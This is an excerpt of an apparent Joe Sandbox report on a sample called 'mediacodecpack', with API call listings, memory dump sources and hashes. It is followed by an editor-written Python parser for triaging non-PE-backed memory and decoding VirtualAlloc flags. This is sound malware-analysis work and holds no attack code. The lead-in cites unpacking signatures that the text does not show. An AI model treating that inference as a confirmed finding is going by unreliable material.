                                                                                • Instruction ID: b5101421ead7136c2604647d03fcd01f3766dac1e779ddf785a187babbfa208d
                                                                                • Opcode Fuzzy Hash: b9177f144503eb45fe3683455aa548c55f5bbb12d66a4501d19553d1075ad522
                                                                                • Instruction Fuzzy Hash: DCE0D872E4122457E714EF98C8517DDB779DF58714F00089AE801777C0DAB56D488BE0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0391E
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D0393D
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Month number is out of range 1..12, xrefs: 02D0392C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Month number is out of range 1..12
                                                                                • API String ID: 3258419250-4198407886
                                                                                • Opcode ID: 3b9b9323fbe93e94091f074058f6f8f6378987075a8f2cc8f3cd6afe802157b8
                                                                                • Instruction ID: 16a11d090cfa57d1377517ae2b70676629ea1644d3e768889cebc55e12d89c27
                                                                                • Opcode Fuzzy Hash: 3b9b9323fbe93e94091f074058f6f8f6378987075a8f2cc8f3cd6afe802157b8
                                                                                • Instruction Fuzzy Hash: 1AE0D832E4022497E724AB98C9517EDB779EF18718F00045AE801777C0DAB16D4C8BE0
                                                                                APIs
                                                                                • TlsAlloc.KERNEL32 ref: 02D019CC
                                                                                • GetLastError.KERNEL32 ref: 02D019D9
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocErrorH_prologLast
                                                                                • String ID: tss
                                                                                • API String ID: 249634027-1638339373
                                                                                • Opcode ID: 1bfa5551ed2acea7caf79ecd2f05dc53ac20a64202d9175dbf38ac29f0b8ec59
                                                                                • Instruction ID: d76995bcb362cc727e8373de73b7d012fa7d13978e30fb20a9acfd4b206ee073
                                                                                • Opcode Fuzzy Hash: 1bfa5551ed2acea7caf79ecd2f05dc53ac20a64202d9175dbf38ac29f0b8ec59
                                                                                • Instruction Fuzzy Hash: 2CE08632D042105B82107B78BC4868EBB94DB41271F208B6AECBD833E0EA309D548BD6
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03BD8
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D03BED
                                                                                  • Part of subcall function 02D114C7: std::exception::exception.LIBCMT ref: 02D114D1
                                                                                  • Part of subcall function 02D0965B: __EH_prolog.LIBCMT ref: 02D09660
                                                                                  • Part of subcall function 02D0965B: __CxxThrowException@8.LIBCMT ref: 02D09689
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 220ec069ef1cfdc6e143f36a47aa3fd3ffbc0d86147f9688fb14ac4585da44c5
                                                                                • Instruction ID: bf652b8e8549b606702faa00ce19b6cd2729824305010572f0b0900c668f3b5f
                                                                                • Opcode Fuzzy Hash: 220ec069ef1cfdc6e143f36a47aa3fd3ffbc0d86147f9688fb14ac4585da44c5
                                                                                • Instruction Fuzzy Hash: BFE0DF30900148DBC704EF94E182BBCB771EF22708F0080ADED0A137A0CB314D09CE91
                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                • Instruction ID: 2adbec297c34dc3d5fc58a6281b1bdaad71761cfda4098cfa9d0d345734132fa
                                                                                • Opcode Fuzzy Hash: 89e6c41d760d97d5fcc59a371cb6f4e80e60aa6d464a71aa99f6417c7b537c35
                                                                                • Instruction Fuzzy Hash: 2D114C70250701DFD7308F28EE85E127BB5F7867207108B3DEAA1E25E0D7359845CB08
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2
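The function listings above are easier to triage once the "APIs" bullets and the "Memory Dump Source" line are pulled into structured records: the API chain per function, whether the dumped region is PE-backed ("based on PE: false" marks memory such as the 02D01000 region that was not mapped from the executable on disk, consistent with the unpacking signatures in this report), and the raw flag words decoded into their documented Win32 names. The following parser is an added example written for this page, not Joe Sandbox code: the regular expressions are inferred from the listing format shown above, and the flag tables are the documented MEM_* and PAGE_* constants. Only VirtualAlloc is decoded, because its four listed words line up with the documented prototype (lpAddress 0, dwSize 0x100000, MEM_RESERVE, PAGE_READWRITE); the Heap* columns in these listings do not (the first word of the HeapAlloc call is 8, which cannot be a heap handle), so their parameter mapping has to be confirmed in the disassembly before decoding. The sample text is copied from the entries above with the page indentation removed.

```python
"""Parse Joe Sandbox function listings ("APIs" / "Memory Dump Source") into
records and decode VirtualAlloc flag arguments.  Editor-written example; the
regexes are inferred from the listing format, not a published Joe Sandbox schema."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two entries copied from the report above, indentation stripped.
SAMPLE = """\
APIs
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
• HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
Memory Dump Source
• Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
APIs
• TlsAlloc.KERNEL32 ref: 02D019CC
• GetLastError.KERNEL32 ref: 02D019D9
  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
Memory Dump Source
• Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:".
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                    r"([\w:@]+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(true|false)$")

# Documented Win32 constants (winnt.h).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
             0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
             0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}


def decode_flags(value: int, table: dict) -> str:
    """Render a flag word as OR-ed names; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                  # ints, or None where the listing shows "?"
    ref: int                    # address of the call site
    subcall_of: Optional[int] = None


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    pe_backed: bool = True      # "based on PE: false" => not mapped from the image on disk


def parse_entries(text: str) -> list:
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            sub, name, mod, argstr, ref = m.groups()
            args = [None if a == "?" else int(a, 16) for a in argstr.split(",")] if argstr else []
            cur.calls.append(ApiCall(name, mod, args, int(ref, 16), int(sub, 16) if sub else None))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.source_file, cur.offset, cur.pe_backed = m[1], int(m[2], 16), m[3] == "true"
    return entries


def describe_virtualalloc(call: ApiCall):
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect): the four
    listed words match the prototype, so decode them positionally.  Heap* calls
    are left undecoded on purpose (see the lead-in)."""
    if call.name != "VirtualAlloc" or len(call.args) < 4 or None in call.args[:4]:
        return None
    addr, size, atype, prot = call.args[:4]
    return {"lpAddress": addr, "dwSize": size,
            "flAllocationType": decode_flags(atype, MEM_FLAGS),
            "flProtect": decode_flags(prot, PAGE_PROT)}


def summarize(entries: list) -> list:
    """Per function: dump offset, PE-backed flag, top-level API chain, decoded VirtualAlloc calls."""
    return [{"offset": hex(e.offset), "pe_backed": e.pe_backed,
             "chain": [c.name for c in e.calls if c.subcall_of is None],
             "virtualalloc": [describe_virtualalloc(c) for c in e.calls if c.name == "VirtualAlloc"]}
            for e in entries]


if __name__ == "__main__":
    for row in summarize(parse_entries(SAMPLE)):
        print(row)
```

Run it against the full text of this report's function section to list every function whose dump region is not PE-backed together with its API chain; a VirtualAlloc reserving a megabyte of PAGE_READWRITE memory inside the original image, next to unpacked code at 02D01000, is the kind of pairing worth following in the disassembly.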